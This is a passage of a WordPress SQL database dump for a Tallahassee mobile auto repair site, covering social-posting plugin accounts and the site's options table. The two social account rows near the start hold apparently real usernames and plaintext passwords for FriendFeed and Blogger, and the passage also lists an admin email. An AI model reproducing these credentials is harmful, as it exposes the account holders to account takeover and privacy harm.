INSERT INTO `wp_maxv_social_accounts` VALUES("54d179b717bda", "Kim Martell", "friendfeed", "0", "1423418444", "1", "24", "true", "", "{\"login\":\"kimmartell\",\"pass\":\"ragi719volto\",\"title_format\":\"%title%\",\"content_format\":\"%excerpt% - Read more at %url%\",\"share_category\":\"\",\"NSFW\":\"false\",\"attach_image\":\"\",\"use_rss_feeds\":\"\",\"spin_content\":\"\",\"videos_enabled\":\"\",\"images_enabled\":\"\",\"token\":\"\",\"consumer_key\":\"\",\"consumer_secret\":\"\",\"page_id\":\"\",\"url\":\"\"}", "1", "24", "false", "0", "0", "false", "0");
INSERT INTO `wp_maxv_social_accounts` VALUES("54d179b716909", "Mike Alan", "blogger", "0", "1423287060", "1", "1", "true", "", "{\"login\":\"support@easyabc.info\",\"pass\":\"36123612Z\",\"page_id\":\"3169227531817022900\",\"title_format\":\"%title%\",\"content_format\":\"%excerpt%\\n\\n<a href=\\\"%url%\\\">Read more...<\\/a>\",\"share_category\":\"\",\"NSFW\":\"false\",\"attach_image\":\"\",\"use_rss_feeds\":\"\",\"spin_content\":\"\",\"videos_enabled\":\"\",\"images_enabled\":\"\",\"token\":\"\",\"consumer_key\":\"\",\"consumer_secret\":\"\",\"url\":\"\"}", "1", "24", "false", "0", "0", "false", "0");

/* INSERT TABLE DATA: wp_options */
INSERT INTO `wp_options` VALUES("1", "siteurl", "http://tallahassee.themobilemechanics.org/", "yes");
INSERT INTO `wp_options` VALUES("2", "home", "http://tallahassee.themobilemechanics.org/", "yes");
INSERT INTO `wp_options` VALUES("3", "blogname", "The Mobile Mechanics", "yes");
INSERT INTO `wp_options` VALUES("4", "blogdescription", "Mobile Auto Repair", "yes");
INSERT INTO `wp_options` VALUES("5", "users_can_register", "0", "yes");
INSERT INTO `wp_options` VALUES("6", "admin_email", "Keifersfl@aol.com", "yes");
INSERT INTO `wp_options` VALUES("7", "start_of_week", "1", "yes");
INSERT INTO `wp_options` VALUES("8", "use_balanceTags", "", "yes");
INSERT INTO `wp_options` VALUES("9", "use_smilies", "", "yes");
INSERT INTO `wp_options` VALUES("10", "require_name_email", "", "yes");
INSERT INTO `wp_options` VALUES("11", "comments_notify", "", "yes");
INSERT INTO `wp_options` VALUES("12", "posts_per_rss", "10", "yes");
INSERT INTO `wp_options` VALUES("13", "rss_use_excerpt", "0", "yes");
INSERT INTO `wp_options` VALUES("14", "mailserver_url", "mail.example.com", "yes");
INSERT INTO `wp_options` VALUES("15", "mailserver_login", "login@example.com", "yes");
INSERT INTO `wp_options` VALUES("16", "mailserver_pass", "password", "yes");
INSERT INTO `wp_options` VALUES("17", "mailserver_port", "110", "yes");
INSERT INTO `wp_options` VALUES("18", "default_category", "2", "yes");
INSERT INTO `wp_options` VALUES("19", "default_comment_status", "closed", "yes");
INSERT INTO `wp_options` VALUES("20", "default_ping_status", "closed", "yes");
INSERT INTO `wp_options` VALUES("21", "default_pingback_flag", "", "yes");
INSERT INTO `wp_options` VALUES("22", "posts_per_page", "10", "yes");
INSERT INTO `wp_options` VALUES("23", "date_format", "F j, Y", "yes");
INSERT INTO `wp_options` VALUES("24", "time_format", "g:i a", "yes");
INSERT INTO `wp_options` VALUES("25", "links_updated_date_format", "F j, Y g:i a", "yes");
INSERT INTO `wp_options` VALUES("26", "comment_moderation", "1", "yes");
INSERT INTO `wp_options` VALUES("27", "moderation_notify", "1", "yes");
INSERT INTO `wp_options` VALUES("28", "permalink_structure", "/%postname%/", "yes");
INSERT INTO `wp_options` VALUES("29", "gzipcompression", "0", "yes");
INSERT INTO `wp_options` VALUES("30", "hack_file", "0", "yes");
INSERT INTO `wp_options` VALUES("31", "blog_charset", "UTF-8", "yes");
INSERT INTO `wp_options` VALUES("32", "moderation_keys", "", "no");
INSERT INTO `wp_options` VALUES("33", "active_plugins", "a:7:{i:0;s:35:\"EzMobileRedirectGenerator/index.php\";i:1;s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";i:2;s:33:\"dashnex-plugin/dashnex-plugin.php\";i:3;s:25:\"duplicator/duplicator.php\";i:4;s:36:\"google-sitemap-generator/sitemap.php\";i:5;s:30:\"social-link-machine/plugin.php\";i:6;s:27:\"wp-super-cache/wp-cache.php\";}", "yes");
INSERT INTO `wp_options` VALUES("34", "category_base", "", "yes");
INSERT INTO `wp_options` VALUES("35", "ping_sites", "http://rpc.pingomatic.com/", "yes");
INSERT INTO `wp_options` VALUES("36", "advanced_edit", "0", "yes");
INSERT INTO `wp_options` VALUES("37", "comment_max_links", "2", "yes");
INSERT INTO `wp_options` VALUES("38", "gmt_offset", "", "yes");
INSERT INTO `wp_options` VALUES("39", "default_email_category", "1", "yes");
INSERT INTO `wp_options` VALUES("40", "recently_edited", "a:2:{i:0;s:85:\"/home/themobilemech207/public_html/wp-content/themes/RockStarLeadTheme-v2-4/style.css\";i:1;s:0:\"\";}", "no");
INSERT INTO `wp_options` VALUES("41", "template", "RockStarLeadTheme-v2-4", "yes");
INSERT INTO `wp_options` VALUES("42", "stylesheet", "RockStarLeadTheme-v2-4", "yes");
INSERT INTO `wp_options` VALUES("43", "comment_whitelist", "1", "yes");
INSERT INTO `wp_options` VALUES("44", "blacklist_keys", "", "no");
INSERT INTO `wp_options` VALUES("45", "comment_registration", "1", "yes");
INSERT INTO `wp_options` VALUES("46", "html_type", "text/html", "yes");
INSERT INTO `wp_options` VALUES("47", "use_trackback", "0", "yes");
INSERT INTO `wp_options` VALUES("48", "default_role", "subscriber", "yes");
INSERT INTO `wp_options` VALUES("49", "db_version", "30133", "yes");
INSERT INTO `wp_options` VALUES("50", "uploads_use_yearmonth_folders", "1", "yes");
INSERT INTO `wp_options` VALUES("51", "upload_path", "", "yes");
INSERT INTO `wp_options` VALUES("52", "blog_public", "1", "yes");
INSERT INTO `wp_options` VALUES("53", "default_link_category", "0", "yes");
INSERT INTO `wp_options` VALUES("54", "show_on_front", "posts", "yes");
INSERT INTO `wp_options` VALUES("55", "tag_base", "", "yes");
INSERT INTO `wp_options` VALUES("56", "show_avatars", "1", "yes");
INSERT INTO `wp_options` VALUES("57", "avatar_rating", "G", "yes");
INSERT INTO `wp_options` VALUES("58", "upload_url_path", "", "yes");
INSERT INTO `wp_options` VALUES("59", "thumbnail_size_w", "150", "yes");
INSERT INTO `wp_options` VALUES("60", "thumbnail_size_h", "150", "yes");
INSERT INTO `wp_options` VALUES("61", "thumbnail_crop", "1", "yes");
INSERT INTO `wp_options` VALUES("62", "medium_size_w", "300", "yes");
INSERT INTO `wp_options` VALUES("63", "medium_size_h", "300", "yes");
INSERT INTO `wp_options` VALUES("64", "avatar_default", "mystery", "yes");
INSERT INTO `wp_options` VALUES("65", "large_size_w", "1024", "yes");
INSERT INTO `wp_options` VALUES("66", "large_size_h", "1024", "yes");
INSERT INTO `wp_options` VALUES("67", "image_default_link_type", "file", "yes");
INSERT INTO `wp_options` VALUES("68", "image_default_size", "", "yes");
INSERT INTO `wp_options` VALUES("69", "image_default_align", "", "yes");
INSERT INTO `wp_options` VALUES("70", "close_comments_for_old_posts", "1", "yes");
INSERT INTO `wp_options` VALUES("71", "close_comments_days_old", "14", "yes");
INSERT INTO `wp_options` VALUES("72", "thread_comments", "", "yes");
INSERT INTO `wp_options` VALUES("73", "thread_comments_depth", "5", "yes");
INSERT INTO `wp_options` VALUES("74", "page_comments", "", "yes");
INSERT INTO `wp_options` VALUES("75", "comments_per_page", "50", "yes");
INSERT INTO `wp_options` VALUES("76", "default_comments_page", "newest", "yes");
INSERT INTO `wp_options` VALUES("77", "comment_order", "asc", "yes");
INSERT INTO `wp_options` VALUES("78", "sticky_posts", "a:2:{i:0;i:14;i:1;i:25;}", "yes");
INSERT INTO `wp_options` VALUES("79", "widget_categories", "a:1:{s:12:\"_multiwidget\";i:1;}", "yes");
INSERT INTO `wp_options` VALUES("80", "widget_text", "a:0:{}", "yes");
INSERT INTO `wp_options` VALUES("81", "widget_rss", "a:0:{}", "yes");
INSERT INTO `wp_options` VALUES("82", "uninstall_plugins", "a:2:{s:27:\"wp-super-cache/wp-cache.php\";s:23:\"wpsupercache_deactivate\";s:30:\"social-link-machine/plugin.php\";a:2:{i:0;s:16:\"MaxVSocialTriger\";i:1;s:9:\"uninstall\";}}", "no");
INSERT INTO `wp_options` VALUES("83", "timezone_string", "America/New_York", "yes");
INSERT INTO `wp_options` VALUES("84", "page_for_posts", "0", "yes");
INSERT INTO `wp_options` VALUES("85", "page_on_front", "0", "yes");
INSERT INTO `wp_options` VALUES("86", "default_post_format", "0", "yes");
INSERT INTO `wp_options` VALUES("87", "link_manager_enabled", "0", "yes");
INSERT INTO `wp_options` VALUES("88", "initial_db_version", "29630", "yes");
INSERT INTO `wp_options` VALUES("89", "wp_user_roles", "a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:62:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:9:\"add_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}", "yes");
INSERT INTO `wp_options` VALUES("90", "widget_search", "a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}", "yes");
INSERT INTO `wp_options` VALUES("91", "widget_recent-posts", "a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;s:9:\"show_date\";b:0;}s:12:\"_multiwidget\";i:1;}", "yes");
INSERT INTO `wp_options` VALUES("92", "widget_recent-comments", "a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}", "yes");
INSERT INTO `wp_options` VALUES("93", "widget_archives", "a:1:{s:12:\"_multiwidget\";i:1;}", "yes");
INSERT INTO `wp_options` VALUES("94", "widget_meta", "a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}", "yes");
INSERT INTO `wp_options` VALUES("95", "sidebars_widgets", "a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:7:\"Sidebar\";a:2:{i:0;s:14:\"recent-posts-2\";i:1;s:6:\"meta-2\";}s:13:\"array_version\";i:3;}", "yes");
INSERT INTO `wp_options` VALUES("96", "cron", "a:13:{i:1423412280;a:1:{s:35:\"maxv_social_trigger_schedule_action\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:28:\"maxv_social_trigger_schedule\";s:4:\"args\";a:0:{}s:8:\"interval\";i:90;}}}i:1423412567;a:1:{s:20:\"wp_maybe_auto_update\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1423415329;a:1:{s:14:\"mm_cron_hourly\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1423416756;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1423416775;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1423417540;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1423431660;a:1:{s:13:\"sm_ping_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1423440000;a:1:{s:11:\"wp_cache_gc\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1423440529;a:2:{s:13:\"mm_cron_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:18:\"mm_cron_twicedaily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1423454941;a:1:{s:40:\"check_plugin_updates-social-link-machine\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1423526929;a:1:{s:14:\"mm_cron_weekly\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1425557329;a:1:{s:15:\"mm_cron_monthly\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:7:\"monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2635200;}}}s:7:\"version\";i:2;}", "yes");
INSERT INTO `wp_options` VALUES("98", "_transient_random_seed", "7c5a7375ebad8dd526b7987165795e72", "yes");
INSERT INTO `wp_options` VALUES("123", "recently_activated", "a:7:{s:39:\"p1-content-magnet/p1-content-magnet.php\";i:1423344601;s:25:\"ultimate-tinymce/main.php\";i:1423344586;s:32:\"paper-template/papertemplate.php\";i:1423344497;s:47:\"heatmaptracker-pro-developer/heatmaptracker.php\";i:1423309964;s:23:\"easywpseo/onpageseo.php\";i:1422994615;s:37:\"mojo-marketplace/mojo-marketplace.php\";i:1422922521;s:19:\"jetpack/jetpack.php\";i:1422922518;}", "yes");
INSERT INTO `wp_options` VALUES("125", "ossdl_off_cdn_url", "http://tallahassee.themobilemechanics.org/", "yes");
INSERT INTO `wp_options` VALUES("126", "ossdl_off_include_dirs", "wp-content,wp-includes", "yes");
INSERT INTO `wp_options` VALUES("127", "ossdl_off_exclude", ".php", "yes");
INSERT INTO `wp_options` VALUES("128", "ossdl_cname", "", "yes");
INSERT INTO `wp_options` VALUES("135", "wpsupercache_start", "1410889364", "yes");
INSERT INTO `wp_options` VALUES("136", "wpsupercache_count", "0", "yes");
INSERT INTO `wp_options` VALUES("137", "supercache_stats", "a:3:{s:9:\"generated\";i:1410890650;s:10:\"supercache\";a:5:{s:7:\"expired\";i:0;s:12:\"expired_list\";a:0:{}s:6:\"cached\";i:0;s:11:\"cached_list\";a:0:{}s:2:\"ts\";i:1410890650;}s:7:\"wpcache\";a:3:{s:6:\"cached\";i:0;s:7:\"expired\";i:0;s:5:\"fsize\";s:3:\"0KB\";}}", "yes");
INSERT INTO `wp_options` VALUES("148", "_transient_twentyfourteen_category_count", "1", "yes");
INSERT INTO `wp_options` VALUES("150", "jpstart_wizard_has_run", "1", "yes");
INSERT INTO `wp_options` VALUES("151", "_transient_timeout_mm_test", "1425341311", "no");
INSERT INTO `wp_options` VALUES("152", "_transient_mm_test", "a:2:{s:4:\"name\";s:18:\"spam-prevention-v1\";s:3:\"key\";s:32:\"a736d113a8bda8c8e934a9b2bd73b7b4\";}", "no");
INSERT INTO `wp_options` VALUES("153", "mm_previous_tests", "a:1:{i:0;s:18:\"spam-prevention-v1\";}", "yes");
INSERT INTO `wp_options` VALUES("154", "_transient_timeout_mm_spam_d887edd1d826f869b68ba832bb2b3521", "1423008514", "no");
INSERT INTO `wp_options` VALUES("155", "_transient_mm_spam_d887edd1d826f869b68ba832bb2b3521", "no", "no");
INSERT INTO `wp_options` VALUES("156", "jetpack_file_data", "a:1:{s:3:\"3.3\";a:46:{s:32:\"2f5859dbb37128dd845c9bdca59e71a8\";a:10:{s:4:\"name\";s:20:\"Spelling and Grammar\";s:11:\"description\";s:89:\"Check your spelling, style, and grammar with the After the Deadline proofreading service.\";s:4:\"sort\";s:1:\"6\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:7:\"Writing\";}s:32:\"dd4271ccc6424f0e2cb43a504d1549fa\";a:10:{s:4:\"name\";s:8:\"Carousel\";s:11:\"description\";s:63:\"Transform standard image galleries into full-screen slideshows.\";s:4:\"sort\";s:2:\"22\";s:10:\"introduced\";s:3:\"1.5\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:17:\"Photos and Videos\";}s:32:\"75c30acace3509f60ced89ad407c2d1a\";a:10:{s:4:\"name\";s:16:\"Jetpack Comments\";s:11:\"description\";s:79:\"Let readers comment with WordPress.com, Twitter, Facebook, or Google+ accounts.\";s:4:\"sort\";s:2:\"20\";s:10:\"introduced\";s:3:\"1.4\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:6:\"Social\";}s:32:\"0956aeb9f0e3c809b3ac8b8dc23cb8d8\";a:10:{s:4:\"name\";s:12:\"Contact Form\";s:11:\"description\";s:44:\"Insert a contact form anywhere on your site.\";s:4:\"sort\";s:2:\"15\";s:10:\"introduced\";s:3:\"1.3\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:5:\"Other\";}s:32:\"f2c635d8f0e857885838e5b4c8ade82d\";a:10:{s:4:\"name\";s:20:\"Custom Content Types\";s:11:\"description\";s:92:\"Organize and display different types of content on your site, separate from posts and pages.\";s:4:\"sort\";s:2:\"34\";s:10:\"introduced\";s:3:\"3.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:7:\"Writing\";}s:32:\"0d3b166477f747b8f98b0fe88b869084\";a:10:{s:4:\"name\";s:10:\"Custom CSS\";s:11:\"description\";s:57:\"Customize your site’s CSS without modifying your theme.\";s:4:\"sort\";s:1:\"2\";s:10:\"introduced\";s:3:\"1.7\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:10:\"Appearance\";}s:32:\"d6c9de08d7f852a4de14e01597aa8638\";a:10:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";}s:32:\"1015913e01574efc87f210763d3b4ee7\";a:10:{s:4:\"name\";s:21:\"Enhanced Distribution\";s:11:\"description\";s:74:\"Share your public posts and comments to search engines and other services.\";s:4:\"sort\";s:1:\"5\";s:10:\"introduced\";s:3:\"1.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:6:\"Public\";s:11:\"module_tags\";s:7:\"Writing\";}s:32:\"00f78b01785bafcbfa7ab8e89bdf35d4\";a:10:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";}s:32:\"48b854adf556e696c8d0f47f16019bdd\";a:10:{s:4:\"name\";s:19:\"Gravatar Hovercards\";s:11:\"description\";s:58:\"Enable pop-up business cards over commenters’ Gravatars.\";s:4:\"sort\";s:2:\"11\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:18:\"Social, Appearance\";}s:32:\"efe21ddbca90e5f068c7cb8059b98ab8\";a:10:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:10:\"introduced\";s:8:\"2.0.3 ??\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:0:\"\";}s:32:\"21126246d3d60461bf511e5dcdd5908f\";a:10:{s:4:\"name\";s:15:\"Infinite Scroll\";s:11:\"description\";s:46:\"Add support for infinite scroll to your theme.\";s:4:\"sort\";s:2:\"26\";s:10:\"introduced\";s:3:\"2.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:10:\"Appearance\";}s:32:\"b835a9ddb7ddb4cc6dfe596b90486870\";a:10:{s:4:\"name\";s:8:\"JSON API\";s:11:\"description\";s:69:\"Allow applications to securely access your content through the cloud.\";s:4:\"sort\";s:2:\"19\";s:10:\"introduced\";s:3:\"1.9\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:6:\"Public\";s:11:\"module_tags\";s:19:\"Writing, Developers\";}s:32:\"bb3f24ed6703578b02296a7a70b86263\";a:10:{s:4:\"name\";s:14:\"Beautiful Math\";s:11:\"description\";s:85:\"Use LaTeX markup language in posts and pages for complex equations and other geekery.\";s:4:\"sort\";s:2:\"12\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:7:\"Writing\";}s:32:\"5577a7b441e67db28873133837c2d9ff\";a:10:{s:4:\"name\";s:5:\"Likes\";s:11:\"description\";s:70:\"Give visitors an easy way to show their appreciation for your content.\";s:4:\"sort\";s:2:\"23\";s:10:\"introduced\";s:3:\"2.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:6:\"Social\";}s:32:\"3370cac9f62d3110005960afa4caed67\";a:10:{s:4:\"name\";s:8:\"Markdown\";s:11:\"description\";s:51:\"Write posts or pages in plain-text Markdown syntax.\";s:4:\"sort\";s:2:\"31\";s:10:\"introduced\";s:3:\"2.8\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:7:\"Writing\";}s:32:\"84e0390e7400a5a0e1d7120833f7be66\";a:10:{s:4:\"name\";s:12:\"Mobile Theme\";s:11:\"description\";s:64:\"Optimize your site with a mobile-friendly theme for smartphones.\";s:4:\"sort\";s:2:\"21\";s:10:\"introduced\";s:3:\"1.8\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:18:\"Appearance, 